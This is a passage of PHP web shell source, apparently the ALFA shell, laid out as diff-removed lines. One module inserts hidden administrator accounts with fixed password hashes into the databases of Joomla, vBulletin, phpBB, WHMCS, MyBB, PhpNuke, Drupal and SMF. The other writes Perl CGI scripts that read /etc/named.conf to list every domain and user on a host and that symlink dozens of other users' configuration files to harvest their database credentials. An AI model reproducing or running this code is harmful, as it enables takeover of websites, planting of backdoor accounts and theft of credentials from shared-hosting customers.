- $database = $_POST['alfa4'];
- $username = $_POST['alfa5'];
- $password = $_POST['alfa6'];
- $admin = $_POST['alfa8'];
- $SQL = $_POST['alfa9'];
- $prefix = $_POST['alfa10'];
- $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
- $solevisible=@mysqli_query($conn,"insert into ".$prefix."users (id,name,username,email,password) values(null,'Super User','".$admin."','".$SQL."','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
- $solevisible=@mysqli_query($conn,"select id from ".$prefix."users where username='".$admin."'") or die(mysqli_error($conn));
- $sole =@mysqli_num_rows($solevisible);
- if ($sole == 1){ $solevis =@mysqli_fetch_assoc($solevisible);
- $res = $solevis['id'];
- } $solevisible=@mysqli_query($conn,"INSERT INTO ".$prefix."user_usergroup_map (user_id,group_id) VALUES ('".$res."', '8')") or die(mysqli_error($conn));
- if($solevisible){ __alert('Success... '.$admin.' is created...');
- } } } if($_POST['alfa4'] && $_POST['alfa4'] == 'vb'){ ALfaNum(4);
- echo __pre().'<center><center><div class="txtfont_header">| vBulletin |<div><p>'.getConfigHtml('vb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,\'vb\',this.username.value,this.password.value,this.prefix.value,this.admin.value,this.email.value);
- return false;
- " method="POST">';
- $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50') );
- create_table($table);
- echo '<p><input value=" " name="send" type="submit"></p></form></center>';
- if($_POST['alfa1'] && $_POST['alfa1'] == '>>'){ $localhost = $_POST['alfa2'];
- $database = $_POST['alfa3'];
- $username = $_POST['alfa5'];
- $password = $_POST['alfa6'];
- $prefix = $_POST['alfa7'];
- $admin = $_POST['alfa8'];
- $SQL = $_POST['alfa9'];
- $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
- $solevisible=@mysqli_query($conn,"insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,'6','$admin','52e28b78f55641cd4618ad1a20f5fd5c','Xw|IbGLhTQA-AwApVv>61y^(z]*<QN','$SQL','".date('Y-m-d')."','".time()."')") or die(mysqli_error($conn));
- $solevisible=@mysqli_query($conn,"select userid from {$prefix}user where username='".$admin."'") or die(mysqli_error($conn));
- $sole = mysqli_num_rows($solevisible);
- if($sole == 1){ $solevis = mysqli_fetch_assoc($solevisible);
- $res = $solevis['userid'];
- } $solevisible=@mysqli_query($conn,"insert into {$prefix}administrator (userid,adminpermissions) values('".$res."','16744444')") or die(mysqli_error($conn));
- if($solevisible){ __alert('Success... '.$admin.' is created...');
- } } } if(isset($_POST['alfa5']) && $_POST['alfa5'] == 'phpbb'){ ALfaNum(5);
- echo __pre().'<center><div class="txtfont_header">| phpBB |</div><p><p>'.getConfigHtml('phpbb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,\'phpbb\',this.password.value,null,this.admin.value,this.email.value,this.prefix.value);
- return false;
- " method="POST">';
- $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50') );
- create_table($table);
- echo '<p><input value=" " name="send" type="submit"></p></form></center>';
- if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){ $localhost = $_POST['alfa2'];
- $database = $_POST['alfa3'];
- $username = $_POST['alfa4'];
- $password = $_POST['alfa6'];
- $admin = $_POST['alfa8'];
- $SQL = $_POST['alfa9'];
- $prefix = $_POST['alfa10'];
- $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
- $hash = md5('solevisible');
- $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
- $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
- $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE user_type = 3") or die(mysqli_error($conn));
- $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE user_type = 3") or die(mysqli_error($conn));
- $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_email ='".$SQL."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
- if($solevisible){ __alert('Success... '.$admin.' is created...');
- } } } if(isset($_POST['alfa6']) && $_POST['alfa6'] == 'whmcs'){ ALfaNum(6);
- echo __pre().'<center><div class="txtfont_header">| Whmcs |</div><p><p>'.getConfigHtml('whmcs').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,\'whmcs\',null,this.admin.value,this.email.value);
- return false;
- " method="POST">';
- $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50') );
- create_table($table);
- echo '<p><input value=" " name="send" type="submit"></p></form></center>';
- if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){ $localhost = $_POST['alfa2'];
- $database = $_POST['alfa3'];
- $username = $_POST['alfa4'];
- $password = $_POST['alfa5'];
- $admin = $_POST['alfa8'];
- $SQL = $_POST['alfa9'];
- $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
- $solevisible=@mysqli_query($conn,"insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,'1','".$admin."','d4a590caacc0be55ef286e40a945ea45','".$SQL."','blend','getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')") or die(mysqli_error($conn));
- if($solevisible){ __alert('Success... '.$admin.' is created...');
- } } } if(isset($_POST['alfa7']) && $_POST['alfa7'] == 'mybb'){ ALfaNum(7);
- echo __pre().'<center><div class="txtfont_header">| Mybb |</div><p><p>'.getConfigHtml('mybb').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,\'mybb\',this.admin.value,this.email.value,this.prefix.value);
- return false;
- " method="POST">';
- $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50') );
- create_table($table);
- echo '<p><input value=" " name="send" type="submit"></p></form></center>';
- if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){ $localhost = $_POST['alfa2'];
- $database = $_POST['alfa3'];
- $username = $_POST['alfa4'];
- $password = $_POST['alfa5'];
- $admin = $_POST['alfa8'];
- $SQL = $_POST['alfa9'];
- $prefix = $_POST['alfa10'];
- $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
- $solevisible=@mysqli_query($conn,"insert into ".$prefix."users (uid,username,password,salt,email,usergroup) values(null,'".$admin."','e71f2c3265619038d826a1ac6e2b9b8e','ywza68lS','".$SQL."','4')") or die(mysqli_error($conn));
- if($solevisible){ __alert('Success... '.$admin.' is created...');
- } } } if(isset($_POST['alfa8']) && $_POST['alfa8'] == 'nuke'){ ALfaNum(8);
- echo __pre().'<center><div class="txtfont_header">| PhpNuke |</div><p><p>'.getConfigHtml('phpnuke').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'nuke\',this.email.value,this.prefix.value);
- return false;
- " method="POST">';
- $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50') );
- create_table($table);
- echo '<p><input value=" " name="send" type="submit"></p></form></center>';
- if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){ $localhost = $_POST['alfa2'];
- $database = $_POST['alfa3'];
- $username = $_POST['alfa4'];
- $password = $_POST['alfa5'];
- $admin = $_POST['alfa7'];
- $SQL = $_POST['alfa9'];
- $prefix = $_POST['alfa10'];
- $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
- $hash = md5($pwd);
- $solevisible=@mysqli_query($conn,"insert into ".$prefix."_authors(aid,name,email,pwd) values('$admin','God','$SQL','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
- if($solevisible){ __alert('Success... '.$admin.' is created...');
- } } } if(isset($_POST['alfa9']) && $_POST['alfa9'] == 'drupal'){ ALfaNum(9);
- echo __pre().'<center><div class="txtfont_header">| Drupal |</div><p><p>'.getConfigHtml('drupal').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,null,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'drupal\');
- return false;
- " method="POST">';
- $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true) );
- create_table($table);
- echo '<p><input value=" " name="send" type="submit"></p></form></center>';
- if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){ $localhost = $_POST['alfa2'];
- $database = $_POST['alfa4'];
- $username = $_POST['alfa5'];
- $password = $_POST['alfa6'];
- $admin = $_POST['alfa8'];
- $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
- $getDescuid = @mysqli_query($conn,"select uid from users order by uid desc limit 0,1");
- $getDescuid = @mysqli_fetch_assoc($getDescuid);
- $getDescuid = $getDescuid['uid'];
- $getdescuid = $getDescuid++;
- $solevisible=@mysqli_query($conn,"insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values('$getDescuid','$admin','\$S\$DP2y9AbolCBOd\/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC','solevisible@fbi.gov','filtered_html','1','Europe/Berlin','solevisible@fbi.gov')") or die(mysqli_error($conn));
- $solevisible=@mysqli_query($conn,"select uid from users where name='".$admin."'") or die(mysqli_error($conn));
- $sole = mysqli_num_rows($solevisible);
- if ($sole == 1){ $solevis = mysqli_fetch_assoc($solevisible);
- $res = $solevis['uid'];
- } $solevisible=@mysqli_query($conn,"INSERT INTO users_roles (uid,rid) VALUES ('".$res."', '3')") or die(mysqli_error($conn));
- if($solevisible){ __alert('Success... '.$admin.' is created...');
- } } } if(isset($_POST['alfa10']) && $_POST['alfa10'] == 'smf'){ ALfaNum(10);
- echo __pre().'<center><center><div class="txtfont_header">| SMF |</div><p><p>'.getConfigHtml('smf').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,null,this.username.value,this.password.value,this.prefix.value,this.admin.value,null,\'smf\');
- return false;
- " method="POST">';
- $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'smf_', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), );
- create_table($table);
- echo '<p><input value=" " name="send" type="submit"></p></form></center>';
- if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){ $localhost = $_POST['alfa2'];
- $database = $_POST['alfa3'];
- $username = $_POST['alfa5'];
- $password = $_POST['alfa6'];
- $prefix = $_POST['alfa7'];
- $admin = $_POST['alfa8'];
- $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
- $setpwAlg = sha1(strtolower($admin) . 'solevisible');
- $solevisible=@mysqli_query($conn,"insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,'$admin','1','$admin','$setpwAlg','solevisible@fbi.gov')") or die(mysqli_error($conn));
- if($solevisible){ __alert('Success... '.$admin.' is created...');
- } } } echo "</div>";
- alfafooter();
- } function alfasymlink(){ alfahead();
- $solevisible8 = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
- $solevisible55=explode('/',$solevisible8 );
- $solevisible8 =str_replace($solevisible55[count($solevisible55)-1],'',$solevisible8 );
- AlfaNum(9,10);
- echo '<div class=header><br><center><div class="txtfont_header">| Symlink |</div><center><h3><a href=javascript:void(0) onclick="g(\'symlink\',null,\'website\',null)">| Domains(Cpanel) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'whole\')">| Whole Symlink(Cpanel) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,null,null,null,null,\'direct\')">| Whole Symlink(Direct-Admin) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,null,\'config\')">| Config Symlink | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,null,null,\'SymFile\')">| File Symlink | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,null,null,null,\'cfucker\')">| Config Fucker | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,null,null,null,null,null,null,\'userpl\')">| Get User With Perl | </a></h3></center>';
- if(isset($_POST['alfa8']) && $_POST['alfa8']=='userpl'){ @mkdir('cgialfa',0755);
- @chdir('cgialfa');
- alfacgihtaccess('cgi');
- $solevisible3 = '#!/usr/bin/perl -I/usr/local/bandmin'."\n".'print "Content-type: text/html\n\n";
- print\'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Language" content="en-us" /><meta http-equiv="Content-Type" content="text/html;
- charset=utf-8" /><title>.::Solevsible GET-User&domain Sheller::.</title><style type="text/css">.newStyle1 {background-color: #000000;
- font-family: "Courier New", Courier, monospace;
- font-size: large;
- font-weight: bold;
- }.style1 {text-align: center;
- color:#ffffff;
- text-decoration:none;
- -moz-transition: all 0.3s ease-out;
- -o-transition: all 0.3s ease-out;
- -webkit-transition: all 0.3s ease-out;
- transition: all 0.3s ease-out}.style1:hover {text-align: center;
- color:#ff0000;
- text-decoration:none;
- }</style></head><body class="newStyle1">\';
- open (d0mains, \'/etc/named.conf\') or $err=1;
- @kr = <d0mains>;
- close d0mains;
- if ($err){print (\'<p class="style1">
- </p><p class="style1">C0uldn\\\'t Bypass it , Sorry</p>\');
- die();
- }else{print \'<p class="style1">
- </p><p class="style1"><b><big><font color="red">Coded By </font><font color="green">Sole Sad & Invisible</font></b></big><br><br> <font color="red"><b><big>Contact : </b></big></font><font color="green"><b><big>solevisible@gmail.com</b></big></font><br><br><font color="gold">Here Is All Domins & Users :</font></p>\';
- }foreach my $one (@kr){if($one =~ m/.*?zone "(.*?)" {/){$filename= "/etc/valiases/".$1;
- $owner = getpwuid((stat($filename))[4]);
- print \'<p class="style1">\'.$1.\' : \'.$owner.\'</p>\';
- }}print\'</body></html>\';
- ';
- @__write_file('user.alfa',$solevisible3);
- @chmod('user.alfa',0755);
- echo __pre();
- echo AlfaiFrameCreator('cgialfa/user.alfa');
- } if(isset($_POST['alfa5']) && $_POST['alfa5']=='cfucker'){ @mkdir('cgialfa',0755);
- @chdir('cgialfa');
- alfacgihtaccess('cgi');
- $solevisible3='#!/usr/bin/perl -I/usr/local/bandmin'."\n".'print "Content-type: text/html\n\n";
- print\'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Language" content="en-us" /><meta http-equiv="Content-Type" content="text/html;
- charset=utf-8" /><title>Solevisible Config Fucker</title><style type="text/css">.solevisible {font-family: Tahoma;
- font-size: 14px;
- font-weight: bold;
- color: #3333ff;
- text-align: center;
- text-shadow: black 0px 0px 2px;
- }#checkouttextarea {webkit-border-radius: 15px;
- }</style></head>\';
- sub lil{($user) = @_;
- $msr = qx{pwd};
- $kola=$msr."/".$user;
- $kola=~s/\n//g;
- symlink(\'/home/\'.$user.\'/public_html/includes/configure.php\',$kola.\'-shop.txt\');
- symlink(\'/home/\'.$user.\'/public_html/os/includes/configure.php\',$kola.\'-shop-os.txt\');
- symlink(\'/home/\'.$user.\'/public_html/oscom/includes/configure.php\',$kola.\'-oscom.txt\');
- symlink(\'/home/\'.$user.\'/public_html/oscommerce/includes/configure.php\',$kola.\'-oscommerce.txt\');
- symlink(\'/home/\'.$user.\'/public_html/oscommerces/includes/configure.php\',$kola.\'-oscommerces.txt\');
- symlink(\'/home/\'.$user.\'/public_html/shop/includes/configure.php\',$kola.\'-shop2.txt\');
- symlink(\'/home/\'.$user.\'/public_html/shopping/includes/configure.php\',$kola.\'-shop-shopping.txt\');
- symlink(\'/home/\'.$user.\'/public_html/sale/includes/configure.php\',$kola.\'-sale.txt\');
- symlink(\'/home/\'.$user.\'/public_html/amember/config.inc.php\',$kola.\'-amember.txt\');
- symlink(\'/home/\'.$user.\'/public_html/config.inc.php\',$kola.\'-amember2.txt\');
- symlink(\'/home/\'.$user.\'/public_html/members/configuration.php\',$kola.\'-members.txt\');
- symlink(\'/home/\'.$user.\'/public_html/config.php\',$kola.\'-2.txt\');
- symlink(\'/home/\'.$user.\'/public_html/forum/includes/config.php\',$kola.\'-forum.txt\');
- symlink(\'/home/\'.$user.\'/public_html/forums/includes/config.php\',$kola.\'-forums.txt\');
- symlink(\'/home/\'.$user.\'/public_html/admin/conf.php\',$kola.\'-5.txt\');
- symlink(\'/home/\'.$user.\'/public_html/admin/config.php\',$kola.\'-4.txt\');
- symlink(\'/home/\'.$user.\'/public_html/wp-config.php\',$kola.\'-wp13.txt\');
- symlink(\'/home/\'.$user.\'/public_html/wp/wp-config.php\',$kola.\'-wp13-wp.txt\');
- symlink(\'/home/\'.$user.\'/public_html/WP/wp-config.php\',$kola.\'-wp13-WP.txt\');
- symlink(\'/home/\'.$user.\'/public_html/wp/beta/wp-config.php\',$kola.\'-wp13-wp-beta.txt\');
- symlink(\'/home/\'.$user.\'/public_html/beta/wp-config.php\',$kola.\'-wp13-beta.txt\');
- symlink(\'/home/\'.$user.\'/public_html/press/wp-config.php\',$kola.\'-wp13-press.txt\');
- symlink(\'/home/\'.$user.\'/public_html/wordpress/wp-config.php\',$kola.\'-wp13-wordpress.txt\');
- symlink(\'/home/\'.$user.\'/public_html/Wordpress/wp-config.php\',$kola.\'-wp13-Wordpress.txt\');
- symlink(\'/home/\'.$user.\'/public_html/wordpress/beta/wp-config.php\',$kola.\'-wp13-wordpress-beta.txt\');
- symlink(\'/home/\'.$user.\'/public_html/news/wp-config.php\',$kola.\'-wp13-news.txt\');
- symlink(\'/home/\'.$user.\'/public_html/new/wp-config.php\',$kola.\'-wp13-new.txt\');
- symlink(\'/home/\'.$user.\'/public_html/blog/wp-config.php\',$kola.\'-wp-blog.txt\');
- symlink(\'/home/\'.$user.\'/public_html/beta/wp-config.php\',$kola.\'-wp-beta.txt\');
- symlink(\'/home/\'.$user.\'/public_html/blogs/wp-config.php\',$kola.\'-wp-blogs.txt\');
- symlink(\'/home/\'.$user.\'/public_html/home/wp-config.php\',$kola.\'-wp-home.txt\');
- symlink(\'/home/\'.$user.\'/public_html/protal/wp-config.php\',$kola.\'-wp-protal.txt\');
- symlink(\'/home/\'.$user.\'/public_html/site/wp-config.php\',$kola.\'-wp-site.txt\');
- symlink(\'/home/\'.$user.\'/public_html/main/wp-config.php\',$kola.\'-wp-main.txt\');
- symlink(\'/home/\'.$user.\'/public_html/test/wp-config.php\',$kola.\'-wp-test.txt\');
- symlink(\'/home/\'.$user.\'/public_html/conf_global.php\',$kola.\'-6.txt\');
- symlink(\'/home/\'.$user.\'/public_html/include/db.php\',$kola.\'-7.txt\');
- symlink(\'/home/\'.$user.\'/public_html/connect.php\',$kola.\'-8.txt\');
- symlink(\'/home/\'.$user.\'/public_html/mk_conf.php\',$kola.\'-9.txt\');
- symlink(\'/home/\'.$user.\'/public_html/include/config.php\',$kola.\'-12.txt\');
- symlink(\'/home/\'.$user.\'/public_html/joomla/configuration.php\',$kola.\'-joomla2.txt\');
- symlink(\'/home/\'.$user.\'/public_html/protal/configuration.php\',$kola.\'-joomla-protal.txt\');
- symlink(\'/home/\'.$user.\'/public_html/joo/configuration.php\',$kola.\'-joo.txt\');
- symlink(\'/home/\'.$user.\'/public_html/cms/configuration.php\',$kola.\'-joomla-cms.txt\');
- symlink(\'/home/\'.$user.\'/public_html/site/configuration.php\',$kola.\'-joomla-site.txt\');
- symlink(\'/home/\'.$user.\'/public_html/main/configuration.php\',$kola.\'-joomla-main.txt\');
- symlink(\'/home/\'.$user.\'/public_html/news/configuration.php\',$kola.\'-joomla-news.txt\');
- symlink(\'/home/\'.$user.\'/public_html/new/configuration.php\',$kola.\'-joomla-new.txt\');
- symlink(\'/home/\'.$user.\'/public_html/home/configuration.php\',$kola.\'-joomla-home.txt\');
- symlink(\'/home/\'.$user.\'/public_html/vb/includes/config.php\',$kola.\'-vb.txt\');
- symlink(\'/home/\'.$user.\'/public_html/vb3/includes/config.php\',$kola.\'-vb3.txt\');
- symlink(\'/home/\'.$user.\'/public_html/includes/config.php\',$kola.\'-includes-vb.txt\');
- symlink(\'/home/\'.$user.\'/public_html/whm/configuration.php\',$kola.\'-whm15.txt\');
- symlink(\'/home/\'.$user.\'/public_html/central/configuration.php\',$kola.\'-whm-central.txt\');
- symlink(\'/home/\'.$user.\'/public_html/whm/whmcs/configuration.php\',$kola.\'-whm-whmcs.txt\');
- symlink(\'/home/\'.$user.\'/public_html/whm/WHMCS/configuration.php\',$kola.\'-whm-WHMCS.txt\');
- symlink(\'/home/\'.$user.\'/public_html/whmc/WHM/configuration.php\',$kola.\'-whmc-WHM.txt\');
- symlink(\'/home/\'.$user.\'/public_html/whmcs/configuration.php\',$kola.\'-whmcs.txt\');
- symlink(\'/home/\'.$user.\'/public_html/support/configuration.php\',$kola.\'-support.txt\');
- symlink(\'/home/\'.$user.\'/public_html/supp/configuration.php\',$kola.\'-supp.txt\');
- symlink(\'/home/\'.$user.\'/public_html/secure/configuration.php\',$kola.\'-sucure.txt\');
- symlink(\'/home/\'.$user.\'/public_html/secure/whm/configuration.php\',$kola.\'-sucure-whm.txt\');
- symlink(\'/home/\'.$user.\'/public_html/secure/whmcs/configuration.php\',$kola.\'-sucure-whmcs.txt\');
- symlink(\'/home/\'.$user.\'/public_html/cpanel/configuration.php\',$kola.\'-cpanel.txt\');
- symlink(\'/home/\'.$user.\'/public_html/panel/configuration.php\',$kola.\'-panel.txt\');
- symlink(\'/home/\'.$user.\'/public_html/host/configuration.php\',$kola.\'-host.txt\');
- symlink(\'/home/\'.$user.\'/public_html/hosting/configuration.php\',$kola.\'-hosting.txt\');
- symlink(\'/home/\'.$user.\'/public_html/hosts/configuration.php\',$kola.\'-hosts.txt\');
